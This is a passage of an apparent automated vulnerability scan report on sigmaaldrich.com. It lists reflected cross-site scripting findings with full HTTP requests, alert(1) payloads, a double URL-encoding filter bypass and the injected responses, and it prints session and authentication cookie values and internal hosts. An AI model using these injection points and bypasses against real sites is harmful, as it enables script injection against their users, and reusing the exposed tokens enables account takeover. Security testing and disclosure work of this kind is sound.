Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:08 GMT
Content-Length: 28933
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/author/site-level873ad";alert(1)//83dd3b63e22/mobile.html","E404") ;
   </script>
...[SNIP]...

1.39. http://www.sigmaaldrich.com/author/site-level/mobile.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /author/site-level/mobile.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb38a%2522%253balert%25281%2529%252f%252fda771394f7e was submitted in the REST URL parameter 3. This input was echoed as eb38a";alert(1)//da771394f7e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters: for example, by submitting %253c instead of the < character, so that the web server's decode yields the harmless-looking %3c and the application's own second decode turns it into <.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /author/site-level/mobile.htmleb38a%2522%253balert%25281%2529%252f%252fda771394f7e HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:10 GMT
Content-Length: 28933
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/author/site-level/mobile.htmleb38a";alert(1)//da771394f7e","E404") ;
   </script>
...[SNIP]...

1.40. http://www.sigmaaldrich.com/catalog/Lookup.do [F parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /catalog/Lookup.do

Issue detail

The value of the F request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4d81'-alert(1)-'d59568379a8 was submitted in the F parameter. This input was echoed unmodified in the application's response. The payload closes the single-quoted literal, joins alert(1) to the surrounding literals with the subtraction operator so that no statement terminator or trailing comment is needed, and reopens a literal to absorb the closing quote; no encoding trick is required here because the value is not filtered at all.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /catalog/Lookup.do?N5=All&N3=mode+matchpartialmax&N4=%60&D7=0&D10=%60&N1=S_ID&ST=RS&N25=0&F=PRc4d81'-alert(1)-'d59568379a8 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.sigmaaldrich.com
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; cmRS=&t1=1289930574210&t2=1289930575333&t3=1289930582775&fti=1289930582775&fn=SearchForm%3A0%3Bemailfriend%3A1%3Bsearchsirnasidebox%3A2%3B&ac=0:S&fd=&uer=&fu=javascript%3AformHandlerTwo%28%29&pi=/content/sigma-aldrich/the-americas/united-states&ho=cm.sigmaaldrich.com/eluminate%3F&ci=90142934; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":1,"to":3,"c":"http://www.sigmaaldrich.com/united-states.html","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}; bn_u=6923287736776754713

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 18:06:01 GMT
Connection: close
Set-Cookie: JSESSIONID=3E41DB1598B528ABFE9A0997CD00C873.stltcat02b; Path=/catalog
Content-Length: 46377


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
   <head>    
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
   
       
   <TITLE>Search Results</TITLE>

   
...[SNIP]...
<script type="text/javascript">
   var selectTab='PRc4d81'-alert(1)-'d59568379a8';
   if(selectTab=='PR'){
       productResultSelected();
   }
   else if(selectTab=='TD'){
       techDocSelected();
   }
   else if(selectTab=='SC'){
       siteContentSelected();
   }
   else if(selectTab=='AA'){
       AnalAppSele
...[SNIP]...

1.41. http://www.sigmaaldrich.com/catalog/Lookup.do [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /catalog/Lookup.do

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c7ff%2522%253balert%25281%2529%252f%252fb2ff7a30651 was submitted in the REST URL parameter 1. This input was echoed as 1c7ff";alert(1)//b2ff7a30651 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters: for example, by submitting %253c instead of the < character, so that the web server's decode yields the harmless-looking %3c and the application's own second decode turns it into <.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /catalog1c7ff%2522%253balert%25281%2529%252f%252fb2ff7a30651/Lookup.do?N5=All&N3=mode+matchpartialmax&N4=%60&D7=0&D10=%60&N1=S_ID&ST=RS&N25=0&F=PR HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.sigmaaldrich.com
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; cmRS=&t1=1289930574210&t2=1289930575333&t3=1289930582775&fti=1289930582775&fn=SearchForm%3A0%3Bemailfriend%3A1%3Bsearchsirnasidebox%3A2%3B&ac=0:S&fd=&uer=&fu=javascript%3AformHandlerTwo%28%29&pi=/content/sigma-aldrich/the-americas/united-states&ho=cm.sigmaaldrich.com/eluminate%3F&ci=90142934; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":1,"to":3,"c":"http://www.sigmaaldrich.com/united-states.html","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}; bn_u=6923287736776754713

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:08 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28921


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/catalog1c7ff";alert(1)//b2ff7a30651/Lookup.do","E404") ;
   </script>
...[SNIP]...

1.42. http://www.sigmaaldrich.com/catalog/search/SearchResultsPage [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /catalog/search/SearchResultsPage

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d3d7%2522%253balert%25281%2529%252f%252f2cbd6686cf8 was submitted in the REST URL parameter 1. This input was echoed as 1d3d7";alert(1)//2cbd6686cf8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters: for example, by submitting %253c instead of the < character, so that the web server's decode yields the harmless-looking %3c and the application's own second decode turns it into <.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /catalog1d3d7%2522%253balert%25281%2529%252f%252f2cbd6686cf8/search/SearchResultsPage?Query=%60&Scope=SearchAll HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.sigmaaldrich.com
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; cmRS=&t1=1289930574210&t2=1289930575333&t3=1289930582775&fti=1289930582775&fn=SearchForm%3A0%3Bemailfriend%3A1%3Bsearchsirnasidebox%3A2%3B&ac=0:S&fd=&uer=&fu=javascript%3AformHandlerTwo%28%29&pi=/content/sigma-aldrich/the-americas/united-states&ho=cm.sigmaaldrich.com/eluminate%3F&ci=90142934; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":1,"to":3,"c":"http://www.sigmaaldrich.com/united-states.html","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}; bn_u=6923287736776754713

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:28 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28936


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/catalog1d3d7";alert(1)//2cbd6686cf8/search/SearchResultsPage","E404") ;
   </script>
...[SNIP]...

1.43. http://www.sigmaaldrich.com/chemistry.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69f7e%2522%253balert%25281%2529%252f%252fd5ddcb5ca40 was submitted in the REST URL parameter 1. This input was echoed as 69f7e";alert(1)//d5ddcb5ca40 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters: for example, by submitting %253c instead of the < character, so that the web server's decode yields the harmless-looking %3c and the application's own second decode turns it into <.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /69f7e%2522%253balert%25281%2529%252f%252fd5ddcb5ca40 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:14 GMT
Content-Length: 28904
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/69f7e";alert(1)//d5ddcb5ca40","E404") ;
   </script>
...[SNIP]...

1.44. http://www.sigmaaldrich.com/chemistry/chemical-synthesis.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/chemical-synthesis.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3111%2522%253balert%25281%2529%252f%252f60a8b7870b7 was submitted in the REST URL parameter 1. This input was echoed as d3111";alert(1)//60a8b7870b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistryd3111%2522%253balert%25281%2529%252f%252f60a8b7870b7/chemical-synthesis.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:16 GMT
Content-Length: 28937
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistryd3111";alert(1)//60a8b7870b7/chemical-synthesis.html","E404") ;
   </script>
...[SNIP]...

1.45. http://www.sigmaaldrich.com/chemistry/chemical-synthesis.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/chemical-synthesis.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54009%2522%253balert%25281%2529%252f%252fb4cada2562 was submitted in the REST URL parameter 2. This input was echoed as 54009";alert(1)//b4cada2562 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry/54009%2522%253balert%25281%2529%252f%252fb4cada2562 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:18 GMT
Content-Length: 28913
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry/54009";alert(1)//b4cada2562","E404") ;
   </script>
...[SNIP]...

1.46. http://www.sigmaaldrich.com/chemistry/chemical-synthesis/chemical-synthesis-catalog.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/chemical-synthesis/chemical-synthesis-catalog.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7fbca%2522%253balert%25281%2529%252f%252fbb6e913b7f5 was submitted in the REST URL parameter 1. This input was echoed as 7fbca";alert(1)//bb6e913b7f5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry7fbca%2522%253balert%25281%2529%252f%252fbb6e913b7f5/chemical-synthesis/chemical-synthesis-catalog.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
